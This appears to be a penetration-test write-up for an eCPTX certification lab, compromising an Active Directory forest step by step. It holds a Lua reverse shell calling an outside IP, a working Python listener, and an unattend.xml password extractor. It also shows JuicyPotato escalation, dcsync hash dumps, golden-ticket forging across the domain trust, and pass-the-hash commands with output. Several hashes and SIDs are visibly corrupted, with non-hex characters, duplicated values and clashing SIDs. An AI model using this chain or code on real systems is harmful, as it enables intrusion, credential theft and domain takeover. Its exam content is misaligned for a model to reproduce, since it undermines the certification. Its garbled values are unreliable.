E CPTX

The document details the steps taken during a penetration test to access various internal systems and escalate privileges. Key steps include opening remote shells, downloading tools, exploiting default credentials, dumping password hashes from a database, creating golden tickets, and accessing domain controllers. The goal was to achieve domain administration access.


1. 10.100.11.101

1 – I opened https://172.16.80.100

2 – and added this code. As printed on this page the listing has two defects that are corrected below: require("oi") should be require("io"), and io.popen(cmd, 'w') opens the pipe write-only, so f:read() returns nil and tcp:send() fails; the loop now also stops when the connection closes instead of calling io.popen(nil).

    -- Lua reverse shell: connect back to the listener and run each received line through a shell
    local host, port = "175.12.80.12", 1111
    local socket = require("socket")
    local io = require("io")
    local tcp = socket.tcp()
    tcp:connect(host, port)
    while true do
      -- receive() reads one line, so the listener must end every command with "\n"
      local cmd, status, partial = tcp:receive()
      if status == "closed" or cmd == nil then break end
      -- run the command and capture its stdout ("r" = read the process output)
      local f = io.popen(cmd, "r")
      local s = f:read("*a")
      f:close()
      -- the raw output goes back with no delimiter
      tcp:send(s)
    end
    tcp:close()

This gave me shell access.
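To drive that shell from the attacking side, here is an added Python listener (my example, not code from this report) that matches the Lua shell's framing: tcp:receive() reads one line, so each command is sent newline-terminated, and the output comes back with no delimiter, so the listener reads until the connection has gone quiet. The bind address, the port and the simulated reply are assumptions; simulate_exchange() stands in for the Lua side so the framing can be checked offline.

```python
import socket
import threading


def send_command(sock, cmd, quiet=0.5, limit=1 << 20):
    """Send one command to the Lua shell and collect its reply.

    The Lua side reads with tcp:receive(), which is line mode, so the command
    must end in "\\n"; it answers with tcp:send(output) and no terminator, so
    we read until the socket has been silent for `quiet` seconds (or `limit`
    bytes have arrived, so a runaway command cannot exhaust memory).
    """
    sock.sendall(cmd.rstrip("\r\n").encode() + b"\n")
    sock.settimeout(quiet)
    chunks, size = [], 0
    while size < limit:
        try:
            data = sock.recv(65536)
        except socket.timeout:
            break            # quiet for `quiet` seconds: the command has finished
        if not data:
            break            # peer closed the connection
        chunks.append(data)
        size += len(data)
    return b"".join(chunks).decode(errors="replace")


def serve(bind="0.0.0.0", port=1111):
    """Wait for the Lua shell to connect, then relay commands typed at stdin."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        conn, peer = srv.accept()
        print(f"[+] shell from {peer[0]}:{peer[1]}")
        with conn:
            while True:
                try:
                    cmd = input("lua$ ")
                except EOFError:
                    break
                if cmd.strip():
                    print(send_command(conn, cmd), end="")


def simulate_exchange(cmd, reply):
    """Offline stand-in for the Lua side (constructed, no network needed).

    Returns (line the fake shell received, text the listener collected).
    """
    ours, theirs = socket.socketpair()
    seen = []

    def fake_lua():
        line = b""
        while not line.endswith(b"\n"):      # mimic tcp:receive() line mode
            b = theirs.recv(1)
            if not b:
                break
            line += b
        seen.append(line)
        theirs.sendall(reply)                 # mimic tcp:send(s), no delimiter

    t = threading.Thread(target=fake_lua)
    t.start()
    out = send_command(ours, cmd)
    t.join()
    ours.close()
    theirs.close()
    return seen[0], out


if __name__ == "__main__":
    serve()
```

The quiet-timeout is the only way to delimit replies with this shell; a long-running command will be cut off after half a second of silence, so raise `quiet` (or redirect the command's output to a file and read it in a second command) for anything slow.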

Downloaded and executed my beacon.

Created a SOCKS proxy on the beacon and used proxychains to pivot through it.

Found "UAT Helpdesk App.url", which contained the following URL: http://uat-helpdesk.els-child.els.local/admin/default.aspx
2. 10.100.11.100

The server at http://10.100.11.100 has an admin panel that accepts the default credentials admin:admin.

From there I uploaded a shell.

Dumping the database gives the user manager1 with the password Compl3xP@ssword.

3. 10.100.11.150

Used manager1 to reach 10.100.11.150/admin/default.aspx

Used the "uatoperator" account against 10.100.11.150:

[11:16:47] root:examples git:(master) # proxychains mssqlclient.py [email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$db1
NULL
SQL>

Document Classification: Confidential
Both options already had the value 1 (the server reports "changed from 1 to 1"), so xp_cmdshell was usable straight away and I could execute commands as NT SERVICE\MSSQL$DB1.

Escalated with JuicyPotato. The SQL Server service account holds SeImpersonatePrivilege by default, which is what JuicyPotato needs: -l is the local COM listener port, -p the program to run as SYSTEM, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, and -c the CLSID of the COM server to abuse.

JuicyPotato.exe -l 1111 -p c:\users\payload.exe -t * -c {8BA3F05E-D86B-21D0-A075-01C04FB68820}

Dumped passwords from the database.
4. 10.100.11.250

Using the admin credentials I got from the database, I gained access to the jumpbox over wmic.

Impersonated uatoperator using make_token.

Then I started a web server on the win10-server machine to host my payloads and began executing commands on the jumpbox via Invoke-Command.
beacon> link JUMPBOX.ELS-CHILD.ELS.LOCAL
[*] Tasked to link to 'JUMPBOX.ELS-CHILD.ELS.LOCAL'
[+] host called home, sent: 56 bytes
[+] established link to child beacon: 10.100.10.250

After gaining shell access I tried to escalate my privileges and managed to do so by reading an unattended install file, which gave me the administrator account's credentials.
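An added example (mine, not part of the report) of the check behind that step: parse an unattend.xml and recover every password it carries. The sample file, the account names and the passwords are constructed for this example; the decoding rule it applies, base64 of the UTF-16LE password with "Password" appended for AutoLogon and LocalAccount entries and "AdministratorPassword" appended for the AdministratorPassword element when PlainText is false, is the convention documented for Windows Setup, and the decoder also tolerates a value stored without the suffix.

```python
import base64
import xml.etree.ElementTree as ET

# Suffix Windows Setup appends to the password before UTF-16LE + base64 encoding
# when <PlainText>false</PlainText>, keyed by the element that carries the value.
SUFFIX = {"AdministratorPassword": "AdministratorPassword", "Password": "Password"}


def encode_unattend(password, suffix):
    """Encode the way Setup expects (used here only to build the sample file)."""
    return base64.b64encode((password + suffix).encode("utf-16-le")).decode("ascii")


def decode_unattend(value, suffix):
    """Reverse it; a value that lacks the expected suffix is returned as decoded."""
    raw = base64.b64decode(value).decode("utf-16-le")
    return raw[: -len(suffix)] if suffix and raw.endswith(suffix) else raw


# Constructed sample unattend.xml (accounts and passwords invented for this example).
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Enabled>true</Enabled>
        <Password>
          <Value>{autologon}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{admin}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_deploy</Name>
            <Password>
              <Value>Plain!Text1</Value>
              <PlainText>true</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""".format(
    autologon=encode_unattend("Winter2019!", "Password"),
    admin=encode_unattend("Spring2020!", "AdministratorPassword"),
)


def _local(tag):
    return tag.rsplit("}", 1)[-1]          # drop the xmlns part of the tag


def _child_text(el, name):
    for c in el:
        if _local(c.tag) == name:
            return (c.text or "").strip()
    return None


def extract_passwords(xml_text):
    """Return (context, account, password) for every password element in the file."""
    root = ET.fromstring(xml_text)
    parents = {c: p for p in root.iter() for c in p}   # ElementTree has no parent links
    found = []
    for el in root.iter():
        name = _local(el.tag)
        if name not in SUFFIX:
            continue
        value = _child_text(el, "Value")
        if not value:
            continue
        # PlainText defaults to true when the element is absent
        plain = (_child_text(el, "PlainText") or "true").lower() == "true"
        password = value if plain else decode_unattend(value, SUFFIX[name])
        parent = parents.get(el)
        pname = _local(parent.tag) if parent is not None else ""
        if name == "AdministratorPassword":
            context, account = name, "Administrator"
        elif pname == "AutoLogon":
            context, account = pname, _child_text(parent, "Username")
        elif pname == "LocalAccount":
            context, account = pname, _child_text(parent, "Name")
        else:
            context, account = pname, None
        found.append((context, account, password))
    return found


if __name__ == "__main__":
    for ctx, acct, pw in extract_passwords(SAMPLE_UNATTEND):
        print(f"{ctx:22} {acct!s:15} {pw}")
```

On a live host the usual locations to feed into extract_passwords() are C:\Windows\Panther\Unattend.xml, C:\Windows\Panther\Unattend\Unattend.xml and C:\Windows\System32\Sysprep\Unattend.xml; Setup is supposed to blank these values after installation, and a file that still carries them is exactly the misconfiguration this step relied on.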
5. 10.100.10.253

From the jumpbox (10.100.11.100) and using uatoperator I started to execute commands over WMI.

I started a web server on the jumpbox to host the payloads.

I started to view the registry and found the user administrator with the password B@dR3gistry.

I used it to escalate and dump hashes:


beacon> dcsync els-child.els.local els-child\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els-child.els.local /user:els-child\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els-child.els.local' will be the domain
[DC] 'child-dc01.els-child.eLS.local' will be the DC server
[DC] 'els-child\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/3/2017 9:11:28 AM
Object Security ID   : S-1-5-21-235po937-599822933-351157107-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: e4ba51c7157fe411po603b661f1ccfbe
    ntlm- 0: e4ba51c7111fe46652603b661f1ccfbe
    lm  - 0: 1389eb4be52e304d1a753a704187dd66

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS-CHILD.ELS.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      aes128_hmac       (4096) : 6031a48480cc6db341758e230e6d
      des_cbc_md5       (4096) : 312a6bdfb09276c7

* Primary:Kerberos *
    Default Salt : ELS-CHILD.ELS.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 312a6bd1j0276c7

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  1cf79ec9db39ca3ui8979d9cca4bdef2
    ..................................
    28  829bb53e575583c3io7f40aabf43f05
    29  0696af48622e71a7oi7cccc94c95d1b

6. 10.100.10.254

To gain access to the parent domain's DC, I created a golden ticket with the child krbtgt hash I got before, for my user, and put the parent domain's Enterprise Admins SID (RID 519) in /sids so the forged PAC carries that group. This works because SID history is not filtered across the parent-child trust inside a forest.

beacon> mimikatz kerberos::golden /user:admin1 /krbtgt:1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-1-5-21-23589937-1851e4348-351157107 /sids:S-1-5-21-22511948-1856962338-1851e4348-519 /ticket:golden.ticket
[*] Tasked beacon to run mimikatz's kerberos::golden /user:admin1 /krbtgt:1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-1-5-21-23511937-599888933-351157107 /sids:S-1-5-21-2128511948-1856962338-15222442862-519 /ticket:golden.ticket command
[+] host called home, sent: 998474 bytes
[+] received output:
User      : admin1
Domain    : els-child.els.local (ELS-CHILD)
SID       : S-1-5-21-23589937-1851e4348-351157107
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime  : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ; 10/26/2029 5:08:32 PM
-> Ticket : golden.ticket

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

beacon> dcsync els.local els\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els.local /user:els\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/7/2017 1:06:33 PM
Object Security ID   : S-1-5-21-2128511948-1856962338-1523442862-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
    ntlm- 0: f4f88438c968756e75252ca4056b0607
    lm  - 0: d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      aes128_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      des_cbc_md5       (4096) : 57fb67328f4651a7

* Primary:Kerberos *
    Default Salt : ELS.LOCALkrbtgt
    Credentials
      des_cbc_md5       : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  b4e712be7d587a19fe5b18b07a7ff799
    ...........................
    29  e1ac403d7b274c3d8c2e2c2d40ab7ccc
beacon> dcsync els.local els\administrator
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els.local /user:els\administrator command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/30/2017 9:21:01 AM
Object Security ID   : S-1-5-21-2128511948-1856962338-1523442862-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 49623ccc820121223b3f0f571b77186
    ntlm- 0:
    ntlm- 1:
    lm  - 0:

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS.LOCALAdministrator
    Default Iterations : 4096
    Credentials

Used the administrator hash to gain access to the parent domain's DC:

beacon> pth els\administrator 49623ccc820121223b3f0f571b77186
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:administrator /domain:els /ntlm:49623ccc820121223b3f0f571b77186 /run:"%COMSPEC% /c echo 749c6eaf8a2 > \\.\pipe\56de86" command
[+] host called home, sent: 746598 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : administrator
domain  : els
program : C:\Windows\system32\cmd.exe /c echo 749c6eaf8a2 > \\.\pipe\56de86
impers. : no
NTLM    : 49623ccc820121223b3f0f571b77186
  |  PID  2052
  |  TID  2676
  |  LSA Process is now R/W
  |  LUID 0 ; 1632426 (00000000:0018e8aa)
  \_ msv1_0   - data copy @ 0000004BBB9CA130 : OK !
  \_ kerberos - data copy @ 0000004BBB97F318
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000004BBB9745C8 (16) -> null

beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$
[+] host called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     03/18/2014 03:33:36   $Recycle.Bin
                                        bootmgr
                                        BOOTNXT
                                        milestone.txt
                                        pagefile.sys

beacon> wmi lab-dc01.els.local smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\lab-dc01.els.local\pipe\status_6321) on lab-dc01.els.local via WMI
[+] host called home, sent: 208972 bytes
[-] Could not connect to pipe (\\lab-dc01.els.local\pipe\status_6321): 2
[+] established link to child beacon: 10.100.10.254

beacon> shell type milestone.txt
[*] Tasked beacon to run: type milestone.txt
[+] host called home, sent: 73 bytes
[*] started download of C:\milestone.txt (97 bytes)
[*] download of milestone.txt is complete
[+] received output:
It seems like i hacked the domain, by just compromising
elearnsecurity’s moderator’s ass. How cool is that?

beacon> shell hostname
[*] Tasked beacon to run: hostname
[+] host called home, sent: 39 bytes
[+] received output:
lab-dc01

beacon> shell ipconfig
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::5574:a356:2968:b78b%12
   IPv4 Address. . . . . . . . . . . : 10.100.10.254
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.100.10.1
